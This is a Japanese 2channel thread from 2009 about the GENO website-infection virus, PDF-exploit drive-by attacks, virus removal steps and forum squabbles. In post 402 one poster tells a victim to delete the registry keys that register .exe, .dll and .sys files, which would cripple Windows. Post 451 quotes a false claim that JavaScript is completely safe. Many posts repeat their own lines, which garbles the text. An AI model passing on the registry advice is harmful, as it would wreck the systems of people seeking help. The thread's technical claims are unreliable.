sysinterna社ってのが以前存在してWindowsの管理用ツールを販売、一部無料公開してた
それをMicrosoftが買収して、元sysinternalのフリーダウンロードページがMicrosoftの一コンテンツとなってる
アップデートもされてるっぽいからとりあえず全部おとしてURLをBMしとくといいよ
sysinterna社ってのが以前存在してWindowsの管理用ツールを販売、一部無料公開してた
それをMicrosoftが買収して、元sysinternalのフリーダウンロードページがMicrosoftの一コンテンツとなってる
アップデートもされてるっぽいからとりあえず全部おとしてURLをBMしとくといいよ
>>389
ご親切なレスに感謝!
おかげさまで、すぐたどり着けました。
Sysinternals ホーム
ttp://technet.microsoft.com/ja-jp/sysinternals/default.aspx
Sysinternals ダウンロード
ttp://technet.microsoft.com/ja-jp/sysinternals/bb545027.aspx
とても参考になります。ありがとうございます。
ご親切なレスに感謝!
おかげさまで、すぐたどり着けました。
Sysinternals ホーム
ttp://technet.microsoft.com/ja-jp/sysinternals/default.aspx
Sysinternals ダウンロード
ttp://technet.microsoft.com/ja-jp/sysinternals/bb545027.aspx
とても参考になります。ありがとうございます。
391 :192.168.0.774:2009/06/10(水) 02:51:41 ID:F4oni6Pd0
類似動作の新型の情報がようやく出はじめましたね。
どこの方かは存じませんが、解説している人、乙であります。
ttp://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=cn%A5%C9%A5%E1%A5%A4%A5%F3%A4%F2%CD%F8%CD%D1%A4%B7%A4%BF+cocacola+%2C+income+%2Cpepsi+%A5%A4%A5%F3%A5%B8%A5%A7%A5%AF%A5%B7%A5%E7%A5%F3
どこの方かは存じませんが、解説している人、乙であります。
ttp://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=cn%A5%C9%A5%E1%A5%A4%A5%F3%A4%F2%CD%F8%CD%D1%A4%B7%A4%BF+cocacola+%2C+income+%2Cpepsi+%A5%A4%A5%F3%A5%B8%A5%A7%A5%AF%A5%B7%A5%E7%A5%F3
392 :192.168.0.774:2009/06/10(水) 21:05:59 ID:/rWKXzaA0
今回のreader(9.1.1)更新も
>adobe readerを開いて ヘルプ→アップデートの有無をチェック
でおkスか?
>adobe readerを開いて ヘルプ→アップデートの有無をチェック
でおkスか?
393 :192.168.0.774:2009/06/10(水) 21:13:50 ID:/rWKXzaA0
↑すんません、アップデートしました。
394 :192.168.0.774:2009/06/11(木) 01:28:02 ID:Imp2Uwco0
>>392-393
おk。そして、9.1.2への更新な。
おk。そして、9.1.2への更新な。
395 :192.168.0.774:2009/06/11(木) 17:18:29 ID:uOndiU0l0
adobe readerが9.1.2になった
396 :192.168.0.774:2009/06/11(木) 21:49:28 ID:jMVQpTl20
>>395
チラシの裏に書いてろクズ
チラシの裏に書いてろクズ
397 :192.168.0.774:2009/06/11(木) 23:04:12 ID:9O3T7NN/0
398 :192.168.0.774:2009/06/12(金) 01:00:05 ID:qtX3J3f5O
何これ?
399 :192.168.0.774:2009/06/13(土) 00:10:50 ID:7Q2x+i690
GENOウイルスのサイト改ざん被害、国内で400件以上確認される
http://internet.watch.impress.co.jp/cda/news/2009/06/12/23779.html
http://internet.watch.impress.co.jp/cda/news/2009/06/12/23779.html
400 :192.168.0.774:2009/06/13(土) 10:17:18 ID:t6zoMOJ60
これは酷い
401 :192.168.0.774:2009/06/13(土) 22:22:05 ID:3M+6Njb90
1.regeditが直接起動しないので、ファイル名指定でcommandを実行、DOS窓を出す。
2.DOS窓からregeditを起動。
3.下記レジストリデータを確認。あれば感染している
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux?
4.キー指定のファイル名をC:\WINDOWS\から削除
5.正常なsqlsodbc.chmファイル(サイズ50727byte)をC:\WINDOWS\system32\に上書きコピー
6.先程のレジストリデータを削除。
7.下記のキーが無いことも確認する。
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperation
8.再起動
このもっと詳細なやり方教えて下さい。
2.DOS窓からregeditを起動。
3.下記レジストリデータを確認。あれば感染している
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux?
4.キー指定のファイル名をC:\WINDOWS\から削除
5.正常なsqlsodbc.chmファイル(サイズ50727byte)をC:\WINDOWS\system32\に上書きコピー
6.先程のレジストリデータを削除。
7.下記のキーが無いことも確認する。
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperation
8.再起動
このもっと詳細なやり方教えて下さい。
402 :192.168.0.774:2009/06/13(土) 22:27:03 ID:yW44nLjk0
>>401
そんなことしなくても
レジストリエディタを開いて、以下のキーを全て削除して、再起動でおk
HKEY_LOCAL_MACHINE\Software\CLASSES\.dll
HKEY_LOCAL_MACHINE\Software\CLASSES\.exe
HKEY_LOCAL_MACHINE\Software\CLASSES\.sys
HKEY_LOCAL_MACHINE\Software\CLASSES\dllfile
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile
HKEY_LOCAL_MACHINE\Software\CLASSES\sysfile
そんなことしなくても
レジストリエディタを開いて、以下のキーを全て削除して、再起動でおk
HKEY_LOCAL_MACHINE\Software\CLASSES\.dll
HKEY_LOCAL_MACHINE\Software\CLASSES\.exe
HKEY_LOCAL_MACHINE\Software\CLASSES\.sys
HKEY_LOCAL_MACHINE\Software\CLASSES\dllfile
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile
HKEY_LOCAL_MACHINE\Software\CLASSES\sysfile
403 :192.168.0.774:2009/06/13(土) 22:50:21 ID:olk3r39Z0
404 :192.168.0.774:2009/06/13(土) 22:57:34 ID:ARaQrfiq0
405 :192.168.0.774:2009/06/14(日) 00:59:16 ID:C/M8+vVy0
このスレは、初心者サポート期間は終了しましたので
406 :192.168.0.774:2009/06/14(日) 19:12:44 ID:EPArmPcM0
1.regeditが直接起動しないので、ファイル名指定でcommandを実行、DOS窓を出す。
2.DOS窓からregeditを起動。
3.下記レジストリデータを確認。あれば感染している
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux?
4.キー指定のファイル名をC:\WINDOWS\から削除
5.正常なsqlsodbc.chmファイル(サイズ50727byte)をC:\WINDOWS\system32\に上書きコピー
6.先程のレジストリデータを削除。
7.下記のキーが無いことも確認する。
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperation
8.再起
5の 正常なsqlsodbc.chmファイル(サイズ50727byte)をC:\WINDOWS\system32\に上書きコピー
の詳しいやり方おしえて
2.DOS窓からregeditを起動。
3.下記レジストリデータを確認。あれば感染している
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux?
4.キー指定のファイル名をC:\WINDOWS\から削除
5.正常なsqlsodbc.chmファイル(サイズ50727byte)をC:\WINDOWS\system32\に上書きコピー
6.先程のレジストリデータを削除。
7.下記のキーが無いことも確認する。
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperation
8.再起
5の 正常なsqlsodbc.chmファイル(サイズ50727byte)をC:\WINDOWS\system32\に上書きコピー
の詳しいやり方おしえて
407 :192.168.0.774:2009/06/14(日) 20:02:46 ID:/NaUDULu0
しつこいな
408 :192.168.0.774:2009/06/14(日) 20:12:05 ID:EsGyl6A+0
>>406 クリーンインストール
409 :192.168.0.774:2009/06/14(日) 20:12:49 ID:o1wDCDqN0
エロサイト見た後でブラウザ閉じたら、いつの間にか別にウィンドウが開いていて
こんな不明なサイトが見つかりますた
わたすは大金持ちになったのですかそうですか
http://www.freelotto.com/register.asp?skin=Cert&noepu=1&partner=1060373&affiliateid=
こんな不明なサイトが見つかりますた
わたすは大金持ちになったのですかそうですか
http://www.freelotto.com/register.asp?skin=Cert&noepu=1&partner=1060373&affiliateid=
410 :192.168.0.774:2009/06/14(日) 20:54:11 ID:EsGyl6A+0
で、それがGENOと何の関係が?
411 :192.168.0.774:2009/06/14(日) 23:01:31 ID:9CFoS/uv0
スレないにGENOウイルス駆除ツールに関するリンクが貼られているというのに>>406は何なんだ?
412 :192.168.0.774:2009/06/15(月) 09:33:14 ID:KVqrUa+P0
だからもう、助けてクレクレは、【いぢったりしないで】スルーしようぜ
外付けブートできるヤツくらい、リアルにひとりやふたりいるだろ
今回は同梱されてなかったが、ルートキットくらい、自分で始末しろ。
いまこのスレは、そういうレベルに戻ってる
面倒見のいいヤツは流出したんだ。あいつらは流動してる。(それでいいけど)
そして、周辺に大規模感染があれば、またふらりと戻ってくる
外付けブートできるヤツくらい、リアルにひとりやふたりいるだろ
今回は同梱されてなかったが、ルートキットくらい、自分で始末しろ。
いまこのスレは、そういうレベルに戻ってる
面倒見のいいヤツは流出したんだ。あいつらは流動してる。(それでいいけど)
そして、周辺に大規模感染があれば、またふらりと戻ってくる
413 :192.168.0.774:2009/06/15(月) 20:47:44 ID:t5CdTQZr0
パソコン一台でも普段はウイルス対策をしっかりやったwindows
ネットサーフィンのときはLinux系を使えばGENOと同じ感染プロセスのウイルスは防げるのかな?
ネットサーフィンのときはLinux系を使えばGENOと同じ感染プロセスのウイルスは防げるのかな?
414 :192.168.0.774:2009/06/15(月) 20:53:55 ID:KVqrUa+P0
インターネッツライフをLinux系で賄えるなら、いまんとこかなりの脅威は回避できる
Macですらかなり間に合うのに、Linuxならしばらく安泰
お約束で触れておくなら、ソーシャルハック系(騙されて垢を奪われる)はLinuxだろうと防げない
死角はゼロにならないので、露出狂にならんようにw
Macですらかなり間に合うのに、Linuxならしばらく安泰
お約束で触れておくなら、ソーシャルハック系(騙されて垢を奪われる)はLinuxだろうと防げない
死角はゼロにならないので、露出狂にならんようにw
415 :192.168.0.774:2009/06/15(月) 23:30:35 ID:HQGGj4ptP
終息した?
416 :192.168.0.774:2009/06/15(月) 23:44:36 ID:8i7xfZWb0
417 :192.168.0.774:2009/06/16(火) 08:40:55 ID:x4DnqVnv0
何突然興奮してるんだろ
418 :192.168.0.774:2009/06/16(火) 13:58:05 ID:IgQj6kkj0
潜伏期間が過ぎて発症したんだろ。
419 :192.168.0.774:2009/06/17(水) 09:49:16 ID:mVglo+DJ0
「PDF」ウイルス、アダルトサイトに仕掛けられる――G Data が報告 (インターネットコム)
ttp://news.www.infoseek.co.jp/topics/comp/n_virus__20090617_4/story/20090615internetcomwe01/
これって関係ある?
ttp://news.www.infoseek.co.jp/topics/comp/n_virus__20090617_4/story/20090615internetcomwe01/
これって関係ある?
420 :192.168.0.774:2009/06/17(水) 10:24:46 ID:JPvfv0Nw0
似てれば似てると書くと思うんだよな
日頃のこつこつとした対策が重要なのは共通。
このまま、随所のGENO系ウイルススレは、大規模webウイルススレになっていくのかな
ちなみに、GENOと名がついていて、GENO(店舗)のことを扱ってるのは除くと、主なところで
・ここ
・同人板
・セキュ板
・女向ゲー一般板
・パソコン一般板
・同人ゲーム板
・ネットwatch板
にスレがある様子(find.2ch.net検出順)。
日頃のこつこつとした対策が重要なのは共通。
このまま、随所のGENO系ウイルススレは、大規模webウイルススレになっていくのかな
ちなみに、GENOと名がついていて、GENO(店舗)のことを扱ってるのは除くと、主なところで
・ここ
・同人板
・セキュ板
・女向ゲー一般板
・パソコン一般板
・同人ゲーム板
・ネットwatch板
にスレがある様子(find.2ch.net検出順)。
421 :192.168.0.774:2009/06/17(水) 11:22:35 ID:wFOzdNIP0
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
GENOウイルススレ ★21 [セキュリティ]
乙女&BL@【公式感染】GENOウイルス注意喚起スレ2 [女向ゲー一般]
【報告専用】同人サイト向け・GENOウィルス注意11 [同人]
【明光○塾】女子中学生の生徒と淫行三昧★178【講師たかゆき】 [ニュース議論]
【明光○塾】女子中学生の生徒と淫行三昧★177【講師たかゆき】 [ニュース議論]
このスレを見ている人はこんなスレも見ています。(ver 0.20)
GENOウイルススレ ★21 [セキュリティ]
乙女&BL@【公式感染】GENOウイルス注意喚起スレ2 [女向ゲー一般]
【報告専用】同人サイト向け・GENOウィルス注意11 [同人]
【明光○塾】女子中学生の生徒と淫行三昧★178【講師たかゆき】 [ニュース議論]
【明光○塾】女子中学生の生徒と淫行三昧★177【講師たかゆき】 [ニュース議論]
422 :192.168.0.774:2009/06/17(水) 16:25:35 ID:6ER87SJA0
GENOより強力な新型が出現したみたいだけど
これって、Acrobat Reader のJavaScript実行をOFFにしていても防げないの?
↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓
〓PDFの脆弱性をつくアダルトサイトに要注意--G Data Softwareが警告〓
http://japan.cnet.com/news/sec/story/0,2000056024,20395086,00.htm
<抜粋>これらのサイトはインラインフレームを含んでいるため、PDFファイルを埋め込むことが可能になっている。
実際にPDFが表示されるわけではないが、 PDFの脆弱性を利用してユーザーにマルウェアを送り込むことから、
通常は「PDFウイルス」と呼ばれている。リンクされているPDF文書は中国にあるサーバに置いてあり、ユーザーが
アダルトサイトのページを開いた瞬間に、AcrobatのプラグインがそのサーバーらPDFを読み込もうとして、実際には
ウイルスをロードしてしまう。
これって、Acrobat Reader のJavaScript実行をOFFにしていても防げないの?
↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓
〓PDFの脆弱性をつくアダルトサイトに要注意--G Data Softwareが警告〓
http://japan.cnet.com/news/sec/story/0,2000056024,20395086,00.htm
<抜粋>これらのサイトはインラインフレームを含んでいるため、PDFファイルを埋め込むことが可能になっている。
実際にPDFが表示されるわけではないが、 PDFの脆弱性を利用してユーザーにマルウェアを送り込むことから、
通常は「PDFウイルス」と呼ばれている。リンクされているPDF文書は中国にあるサーバに置いてあり、ユーザーが
アダルトサイトのページを開いた瞬間に、AcrobatのプラグインがそのサーバーらPDFを読み込もうとして、実際には
ウイルスをロードしてしまう。
423 :192.168.0.774:2009/06/17(水) 23:17:23 ID:cNPieBDU0
悩むくらいならReaderごとアンインスコしたほうがいい
424 :192.168.0.774:2009/06/18(木) 12:57:44 ID:oSNBi7b+0
今大変なことになっている新種のウイルス「Nine-Ball ナインボール」を検出できるのはわずかのベンダーのソフトのみ(米セキュリティ企業公表)
http://www.virustotal.com/analisis/62254bf6a13a438bc53c0f3745c622c5c1604aa37e4f866036a1e94c35cc68f7-1245137075
http://www.virustotal.com/analisis/62254bf6a13a438bc53c0f3745c622c5c1604aa37e4f866036a1e94c35cc68f7-1245137075
425 :192.168.0.774:2009/06/19(金) 12:42:57 ID:1dktemNX0
“けん"を変換すると“ロン"が出るんだけど、これって何かある?
代わりに“ケン"が出ない
(一文字ずつなら出せるけど)
GENOはこのまえ症状がそっくりでリカバリしたけど、セキュリティは前のままなんで
代わりに“ケン"が出ない
(一文字ずつなら出せるけど)
GENOはこのまえ症状がそっくりでリカバリしたけど、セキュリティは前のままなんで
426 :192.168.0.774:2009/06/19(金) 13:31:32 ID:PsMl7UOK0
そういうの、あるよ。
GENOが流行るずっと前から、特定の単語を打ち込むと、
全然関係ない単語に変換されちゃうの。
気持ち悪いけど、人に言う分には面白いし直し方分からんから放置してる。
GENOが流行るずっと前から、特定の単語を打ち込むと、
全然関係ない単語に変換されちゃうの。
気持ち悪いけど、人に言う分には面白いし直し方分からんから放置してる。
427 :192.168.0.774:2009/06/19(金) 14:04:26 ID:l7tIMz7M0
>>425
前のままじゃダメだと自覚があるならそこを直せばいいのに
前のままじゃダメだと自覚があるならそこを直せばいいのに
428 :192.168.0.774:2009/06/19(金) 17:13:02 ID:1dktemNX0
じゃあマザーボードがおかしいのかもしれんな
>>427
やっぱねウィルスソフトもねアホらしいしね、1年くらいなら最新入れんでも大丈夫な気がするじゃん
去年の11月に更新終了して、今年の終わりにノートン2010だっけ?出たら買おうかと思ってる
>>427
やっぱねウィルスソフトもねアホらしいしね、1年くらいなら最新入れんでも大丈夫な気がするじゃん
去年の11月に更新終了して、今年の終わりにノートン2010だっけ?出たら買おうかと思ってる
429 :192.168.0.774:2009/06/19(金) 22:01:56 ID:l7tIMz7M0
なんだ釣りだったのか
430 :192.168.0.774:2009/06/19(金) 22:24:10 ID:EWSkSKSu0
>ウィルスソフト
この時点で釣り決定
この時点で釣り決定
431 :192.168.0.774:2009/06/22(月) 13:12:26 ID:OFcMMviC0
GENOウイルススレ ★22
http://pc11.2ch.net/test/read.cgi/sec/1245640557/
http://pc11.2ch.net/test/read.cgi/sec/1245640557/
432 :192.168.0.774:2009/06/22(月) 13:13:45 ID:Qff0AEDv0
アフィは許せる(スルーするだけだ)が、こんなにそこいら中に次スレはいらんぞw 消化していこうぜ
433 :192.168.0.774:2009/06/22(月) 13:17:35 ID:UL1vSPoA0
めいめいすきなところに移動汁
434 :192.168.0.774:2009/06/22(月) 13:20:15 ID:UL1vSPoA0
途中送信してしまった
セキュ板994の人が「めいめいすきなところに移動汁」
つってんだから好きなところに書き込めばいいんじゃね
セキュ板994の人が「めいめいすきなところに移動汁」
つってんだから好きなところに書き込めばいいんじゃね
435 :192.168.0.774:2009/06/22(月) 21:51:07 ID:zjMZOGeY0
いらないって言われてるのに立てるとか…
436 :192.168.0.774:2009/06/22(月) 22:00:03 ID:n9xFzxJy0
誰も書き込まなければそのうち落ちるんじゃね
初質板の鑑定スレみたいに双方がアラシ呼ばわりする事態だけは避けてほしいが
初質板の鑑定スレみたいに双方がアラシ呼ばわりする事態だけは避けてほしいが
437 :192.168.0.774:2009/06/22(月) 22:48:53 ID:WFTQ6v550
そういえばあったな。向こうはIDでないとかで
438 :192.168.0.774:2009/06/22(月) 23:05:58 ID:n9xFzxJy0
まぁ、ここの人たちはIDなくても見分けつく人が多いから大丈夫だと思うけどね
対立を演出したいやつにウイルスコード貼られてもスルーしてるし
対立を演出したいやつにウイルスコード貼られてもスルーしてるし
439 :192.168.0.774:2009/06/23(火) 04:14:43 ID:aGFOinC00
真するできないねえ
440 :192.168.0.774:2009/06/23(火) 06:22:28 ID:etrZRzT30
└(゚∀゚└)真する!真する!!(┘゚∀゚)┘ 真する!真する!! (:D)| ̄|_
441 :192.168.0.774:2009/06/23(火) 06:28:16 ID:87zUBhtd0
わけのわからないAA貼り付けてごまかそうとしても無駄だよ!!!!
もう一度確認しておこう。
テクノの元祖はスナインコッコスマナラコッサーラ長老。
もう一度確認しておこう。
テクノの元祖はスナインコッコスマナラコッサーラ長老。
442 :192.168.0.774:2009/06/23(火) 06:31:32 ID:etrZRzT30
(´;ω;`) (´;ω;:;.:... (´;:;.:.:;.:... .:.:;.:......
443 :192.168.0.774:2009/06/24(水) 11:19:53 ID:thH4Vr8L0
444 :192.168.0.774:2009/06/24(水) 21:30:38 ID:qVqYmhkg0
テンプレ勝手に変えるから
445 :192.168.0.774:2009/06/24(水) 22:44:50 ID:kaNkJ5AZ0 BE:530136544-2BP(0)
>>443
ともあれ手を動かすって考えには賛同してる 失敗を恐れるのが普通だし、これがなかなかできない
やるなら、精度向上を続けるとか、停止するその日まで(削除ではなく、跡地にすればいいと思う)、
サポートを続けないととは思うけどね
ともあれ手を動かすって考えには賛同してる 失敗を恐れるのが普通だし、これがなかなかできない
やるなら、精度向上を続けるとか、停止するその日まで(削除ではなく、跡地にすればいいと思う)、
サポートを続けないととは思うけどね
446 :192.168.0.774:2009/06/24(水) 22:46:48 ID:kaNkJ5AZ0
…ただし、一般論として、人の不幸を、直接小銭の種にしようってのは、
受け入れられるか否か、文化によるかなと
受け入れられるか否か、文化によるかなと
447 :192.168.0.774:2009/06/24(水) 22:59:37 ID:qVqYmhkg0
あのサイトそのものにはべつになんのアレも無い。スキにすればいい
テンプレ勝手に変えてwikiなんかのリンク外ス奴がでなきゃね
>wiki、2ちゃんねるの情報は、誰でも書き込みできてしまうので、信憑性に欠き、初心者の方は惑わされやすいです。
本人じゃないでしょさすがに
テンプレ勝手に変えてwikiなんかのリンク外ス奴がでなきゃね
>wiki、2ちゃんねるの情報は、誰でも書き込みできてしまうので、信憑性に欠き、初心者の方は惑わされやすいです。
本人じゃないでしょさすがに
448 :192.168.0.774:2009/06/24(水) 23:15:52 ID:eGt3q4yV0
>信憑性に欠き
ひどい日本語だ
ひどい日本語だ
449 :192.168.0.774:2009/06/25(木) 03:35:49 ID:8ZyQJlBp0 BE:397602162-2BP(0)
うまく言えないな、、 直接小銭の種にしようとしてるかはわからないし、
直接小銭の種にしようとしてるとみなされるかどうかもわからない。
このまま、日本がターゲットに選ばれなければいいなと。なんとなく。
直接小銭の種にしようとしてるとみなされるかどうかもわからない。
このまま、日本がターゲットに選ばれなければいいなと。なんとなく。
450 :192.168.0.774:2009/06/25(木) 21:45:01 ID:N/dc4Nk50
……。
451 :192.168.0.774:2009/06/25(木) 21:58:12 ID:CiB5GY6i0
406 名前: ◆XcxlmnqGqU [sage] 投稿日:2009/05/30(土) 19:57:35
>>403
全く安全
多くのウイルスがJavaScriptを介して、pdf、swf等を読み込ませるからJavaScriptが問題だと勘違いされがちですが、
javascript単体にはローカルファイル操作、レジストリ改変等を行う機能は存在しません
よってその対処法を導入していれば持続的な被害に合うことは一切ありません
>>404
雑魚は黙ってなさい
495 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/31(日) 17:31:04
幸せサーバープロジェクト 「アイデア・技術のある人募集中」★3
http://qb5.2ch.net/test/read.cgi/operate/1241361889/
XcxlmnqGqU 192-319 424
499 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/31(日) 18:10:08
運営スレであんだけファビョって
インターネット板とセキュ板のテンプレ勝手に変えて新スレたてて
今度は何をしてくれるのかな
646 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/06/04(木) 16:25:44
★同人新スレにアフィが追加されました!
【報告専用】同人サイト向け・GENOウィルス注意11
http://changi.2ch.net/test/read.cgi/doujin/1244096936/
>>403
全く安全
多くのウイルスがJavaScriptを介して、pdf、swf等を読み込ませるからJavaScriptが問題だと勘違いされがちですが、
javascript単体にはローカルファイル操作、レジストリ改変等を行う機能は存在しません
よってその対処法を導入していれば持続的な被害に合うことは一切ありません
>>404
雑魚は黙ってなさい
495 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/31(日) 17:31:04
幸せサーバープロジェクト 「アイデア・技術のある人募集中」★3
http://qb5.2ch.net/test/read.cgi/operate/1241361889/
XcxlmnqGqU 192-319 424
499 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/31(日) 18:10:08
運営スレであんだけファビョって
インターネット板とセキュ板のテンプレ勝手に変えて新スレたてて
今度は何をしてくれるのかな
646 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/06/04(木) 16:25:44
★同人新スレにアフィが追加されました!
【報告専用】同人サイト向け・GENOウィルス注意11
http://changi.2ch.net/test/read.cgi/doujin/1244096936/
452 :192.168.0.774:2009/06/25(木) 22:29:39 ID:u/8UXvhn0
>>451
一個目、何度見てもジワジワくる
一個目、何度見てもジワジワくる
453 :192.168.0.774:2009/06/26(金) 03:04:11 ID:wSR8F7l40
皮肉屋ですね(笑)
454 :192.168.0.774:2009/06/26(金) 03:05:03 ID:5xv1P6lY0
>>451の話はJavaのところが問題なのにな
455 :192.168.0.774:2009/06/26(金) 04:21:57 ID:wSR8F7l40
そ、そうですね A^-^;)
456 :192.168.0.774:2009/07/02(木) 00:36:56 ID:lL97EwEVP
このウイルス思ったけど被害がなかったようだね
おまえらに釣られて騒ぎすぎたぜ
おまえらに釣られて騒ぎすぎたぜ
457 :192.168.0.774:2009/07/02(木) 14:11:39 ID:dPCiJwkr0
>>456
騒いだからサイト閉じられて被害が少なかったとは思えんのか?
騒いだからサイト閉じられて被害が少なかったとは思えんのか?
458 :192.168.0.774:2009/07/02(木) 16:08:14 ID:XV4YJu590
被害あったってゾンビになっちゃったかもしれないやつらは気づいてないだろ
459 :192.168.0.774:2009/07/02(木) 19:55:54 ID:DAKHPjSE0
それに感染に気付いていても、サイト持ちじゃないから実害ないし
このままでもいいよね的なカキコをしてた奴が複数いた事を考えると
自覚していながら放置組も相当いるかも知れない。
そしてそれらPCがボットネットに組み込まれているであろう事を思えば。。。
後で「実は抜かれてるのは個人情報もでした」となったら阿鼻叫喚かもな。
このままでもいいよね的なカキコをしてた奴が複数いた事を考えると
自覚していながら放置組も相当いるかも知れない。
そしてそれらPCがボットネットに組み込まれているであろう事を思えば。。。
後で「実は抜かれてるのは個人情報もでした」となったら阿鼻叫喚かもな。
460 :192.168.0.774:2009/07/02(木) 20:03:21 ID:hEHmcCZ90
データ破壊系ではないウイルスなら個人情報を抜かれるかも
と考えると思うんだが、実害ないしいいやと思えるのがわからん
と考えると思うんだが、実害ないしいいやと思えるのがわからん
461 :192.168.0.774:2009/07/02(木) 21:10:06 ID:rR8NeVNy0
そんなやついんの
462 :192.168.0.774:2009/07/02(木) 21:52:57 ID:HR77S6HE0
いるよ。「WinPCでネットやってりゃ多少なりともウイルス飼ってるのが普通」
ぐらいのこと、平気で言うやついるし
ぐらいのこと、平気で言うやついるし
463 :192.168.0.774:2009/07/02(木) 22:37:03 ID:1AbxG1a50
GENO全盛期に
「ネットで買い物しないしPCメールしないし個人情報無いから別に感染してもいいや」て言われた
「ネットで買い物しないしPCメールしないし個人情報無いから別に感染してもいいや」て言われた
464 :192.168.0.774:2009/07/02(木) 23:42:59 ID:rR8NeVNy0
クッキーごときを検出しまくったへいがい
465 :192.168.0.774:2009/07/03(金) 03:56:49 ID:EjGCdy4A0
>>462-463
いたね、そういう人。言われた人はホントお気の毒だった
ネットやっててウイルスに感染する覚悟を持つことと
ウイルス貯蔵庫兼配給部隊になることとは別問題のはずなのに
前に女向ゲー一般GENOスレで見たネット版「腸チフスのメアリー」
そんな人がゴロゴロしてるんだろうな
いたね、そういう人。言われた人はホントお気の毒だった
ネットやっててウイルスに感染する覚悟を持つことと
ウイルス貯蔵庫兼配給部隊になることとは別問題のはずなのに
前に女向ゲー一般GENOスレで見たネット版「腸チフスのメアリー」
そんな人がゴロゴロしてるんだろうな
466 :192.168.0.774:2009/07/03(金) 08:24:53 ID:TmNzMHZD0
本人にその意思がなくても、第三者に電子計算機を利用され、
他者の電子計算機器等に障害を発生もしくは破壊行為を行った場合、
○○万円以下の罰金もしくは懲役○○年に処す
くらいの法律がないと、「俺は悪くない」で済んじゃうからな。
現段階では、プロパイダが責任を持って通信遮断を行うことになってるんだっけ?
他者の電子計算機器等に障害を発生もしくは破壊行為を行った場合、
○○万円以下の罰金もしくは懲役○○年に処す
くらいの法律がないと、「俺は悪くない」で済んじゃうからな。
現段階では、プロパイダが責任を持って通信遮断を行うことになってるんだっけ?
467 :192.168.0.774:2009/07/03(金) 09:45:50 ID:F0OTa+om0
いづれパソコンも免許がいるようになる
バカはパソコンを使えない時代が来るってこったw
バカはパソコンを使えない時代が来るってこったw
468 :192.168.0.774:2009/07/03(金) 18:22:00 ID:EjGCdy4A0
469 :192.168.0.774:2009/07/03(金) 21:16:59 ID:mm3IBTQg0
たしかに、そういうこと熟知してる者のレスに見えるな
そういや前スレでも法に精通した香具師がいたが、お仲間か
そういや前スレでも法に精通した香具師がいたが、お仲間か
470 :192.168.0.774:2009/07/04(土) 15:39:06 ID:eC8cizyU0
ムチャ振り(・A ・)イクナイ!
せめて釣り氏さんみたいに誘い受けにとどめれ
と言いたいところだが、>>466のは普通に質問
なんでもかんでも自分へのレスだと思い込むのは
2ch初心者がよく陥る罠。それを諫めるために有名な
「2chにはひろゆきと俺とお前だけ」のコピペがある
せめて釣り氏さんみたいに誘い受けにとどめれ
と言いたいところだが、>>466のは普通に質問
なんでもかんでも自分へのレスだと思い込むのは
2ch初心者がよく陥る罠。それを諫めるために有名な
「2chにはひろゆきと俺とお前だけ」のコピペがある
471 :192.168.0.774:2009/07/04(土) 16:20:10 ID:tMN9XWSy0
てか実際、2chにはつーかネットの中には
オレとオマエとひろゆきだけ
オレとオマエとひろゆきだけ
472 :192.168.0.774:2009/07/04(土) 17:33:15 ID:mOYjbOaL0
全部俺の自演
473 :192.168.0.774:2009/07/04(土) 18:41:54 ID:eC8cizyU0
ぶっちゃけ世界には、おれとおまえと
ひろゆきだけ。後は全部おれのスタンド
ひろゆきだけ。後は全部おれのスタンド
474 :192.168.0.774:2009/07/04(土) 19:23:52 ID:tMN9XWSy0
ひろゆきさんはどこまでもついてくるんですね(笑)
475 :192.168.0.774:2009/07/04(土) 19:27:53 ID:eC8cizyU0
そりゃオマ、ひろゆきは…
おや?こんな時間に誰か来たようだ
おや?こんな時間に誰か来たようだ
476 :192.168.0.774:2009/07/04(土) 20:58:27 ID:VfNAT2grP
477 :192.168.0.774:2009/07/07(火) 10:31:14 ID:O20iNlf+0
関連: ばりゅどめたんに埋め込みスクリプトあらわる
ばりゅどめ側は駆除済みだが、顛末が読める
攻撃鯖は生存中 検体クレクレたん(俺含む)は急げ
VALUE DOMAINってどうよ? part33
http://pc11.2ch.net/test/read.cgi/hosting/1246828727/
ばりゅどめ側は駆除済みだが、顛末が読める
攻撃鯖は生存中 検体クレクレたん(俺含む)は急げ
VALUE DOMAINってどうよ? part33
http://pc11.2ch.net/test/read.cgi/hosting/1246828727/
478 :192.168.0.774:2009/07/10(金) 00:24:44 ID:aAq3fgTNO
genoに感染しました。
aから始まるウィルスチェッカーだと駆除できるというのをみて、インストールしたら、
うっかり再起動してしまい、ブルースクリーンで動かなくなってしまいました。
どうすればよいのでしょうか
aから始まるウィルスチェッカーだと駆除できるというのをみて、インストールしたら、
うっかり再起動してしまい、ブルースクリーンで動かなくなってしまいました。
どうすればよいのでしょうか
479 :192.168.0.774:2009/07/10(金) 00:51:58 ID:uLP/X9D10
それ本当にGenoなの?
とりあえずOSいれなおせばいいよ
とりあえずOSいれなおせばいいよ
まとめにかいてあるのは試しました。コマンドプロテクトのです。
今一人暮らしをしていて、実家にosのCDrおいてます。
もし買うとしたらいくらぐらいですか?
今一人暮らしをしていて、実家にosのCDrおいてます。
もし買うとしたらいくらぐらいですか?
